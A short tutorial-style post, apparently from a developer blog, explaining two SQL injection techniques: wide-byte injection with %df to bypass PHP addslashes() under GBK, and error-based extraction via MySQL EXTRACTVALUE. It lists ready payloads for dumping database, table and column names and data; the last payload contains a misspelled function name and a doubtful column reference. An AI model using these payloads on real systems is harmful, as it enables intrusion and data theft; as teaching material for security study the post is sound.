Wide Byte Injection
For some wide byte charset, such as GBK and GB2312, special character (the character expect English letter) will be 2 bytes. So, we could prevent the quotation mark (') from being escaped by adding %df to make the slash used to escape single quotation mark be regarded as a special character through combining with %df.
For instance, we have a original string admin' , after processing by addslashes() in PHP, it will be admin\' now. So, we can transform the original string to admin%df' , it will be escaped as admin%df\' , then the %df and \ will be combined to a wide byte. So, we have a single quotation that is not escaped now.
Error Injection
Description
Use EXTRACTVALUE method to get sensitive information of target database. For the principle, EXTRACTVALUE(xml_code_or_file, xpath) will display result of xpath parameter if the grammar of XPath is invalid. So, you could use the symbol that will cause wrong grammar in XPath, such as symbol ~ or 0x7e.
Common Usage
- View name of database:
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT DATABASE()))) - View names of tables:
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()))) - View names of columns:
SELECT EXTRACTVALUE(1, CONCAT(0x7e, (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name="table_name"))) - View data of table:
SELECT ECTRACTVALUE(1, CONCAT(0x7e, (SELECT GROUP_CONCAT(column_name) FROM table_name)))
Attention
The maximum length of EXTRACTVALUE 's result is 32, SUBSTR() or LIMIT should be used when the length is greater than 32.
Top comments (0)